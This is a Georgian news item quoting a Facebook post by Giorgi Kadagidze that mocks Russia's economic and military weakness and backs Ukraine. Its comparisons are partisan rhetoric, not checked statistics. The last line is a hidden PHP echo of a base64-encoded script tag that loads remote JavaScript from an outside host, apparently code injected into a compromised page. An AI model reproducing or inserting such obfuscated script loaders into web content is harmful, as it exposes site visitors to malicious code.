celsiusi
ავერსი საქკაბელი
ერთადერთი რაც რუსეთს შეუძლია, არის ის, რომ დაჩაგროს თავისზე ღარიბი და პატარა მეზობლები, ხელები აფათუროს მათ შიდა პოლიტიკაში, დაარწმუნოს ისინი რომ მათ არაფერი ეშველებათ და მუდამ სიღარიბეში აცხოვროს, - ამის შესახებ გიორგი ქადაგიძე Facebook-ზე წერს.
 
ქადაგიძის თმქით, რუსეთის ეკონომიკა Apple-ზე ცოტა დიდია, მას არ შეუძლია აწარმოოს თუნდაც საშუალო მასშტაბის სამხედრო კამპანია.
 
ქადაგიძეს შედარებები და რამდენიმე მონაცემი მოჰყავს რუსეთის შესახებ. მის პოსტს სრულად გთავაზობთ:
 
"რუსული "დიდება" შედარებისთვის;
 
- რუსეთის ეკონომიკა კომპანია "ეფლზე" ცოტა დიდია;
 
- რუსეთის მთლიანი სამხედრო ბიუჯეტის ოდენობის თანხას, "მაიკროსოფტი" ქენდი ქრაშის და ქოლ ოფ დიუთის ვიდეო თამაშებში იხდის;
 
- მსოფლიოს ტოპ 200 სასწავლებელში არცერთი რუსული უნივერსიტეტი არ არის. რუსეთში, არცერთ სფეროში, ათწლეულებია არ შექმნილა არანაირი ღირებული ტექნოლოგია;
 
- მსოფლიოში 130-ე კორუფციით, მხოლოდ ჩამორჩენილ აფრიკულ სახელმწიფოებს უსწრებს;
 
- რუსეთის ნავთობის მთლიანი ექსპორტის ოდენობის თანხა გაედინება დასავლური ქვეყნების უძრავ და მოძრავ ქონებაში, სადაც ასევე რუსული "ელიტის" შვილები ცხოვრობენ განცხრომაში;
 
დღევანდელ რუსეთს არ გააჩნია არანაირი ფინანსური, სამხედრო თუ ინტელექტუალური რესურსი აწარმოოს თუნდაც საშუალო მასშტაბის და ვადის სამხედრო კამპანია. ცივი ომის იმიტაცია კი, უბრალოდ ღიმილის მომგვრელია, თუ რიცხვებს ჩავხედავთ.
 
ერთადერთი, რაც მას შეუძლია, დაჩაგროს თავისზე ღარიბი და პატარა მეზობლები, ხელები აფათუროს მათ შიდა პოლიტიკაში, დაარწმუნოს ისინი რომ მათ არაფერი ეშველებათ და მუდამ სიღარიბეში აცხოვროს.
სრული მხარდაჭერა უკრაინას, რომელსაც რუსეთი ვერასდროს მოერევა!!!".
 
ცნობისთვის, რუსეთმა უკრაინის საზღვართან ახლოს 100 000 სამხედრო განალაგა, თუმცა, უარყოფს რომ აპირებს უკრაინაში შეჭრას. აღსანიშნავია, რომ პრეზიდენტმა პუტინმა არაერთხელ მოუწოდა დასავლეთს, და მოითხოვა უკრაინის NATO-ში არ შეშვება.
1043
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");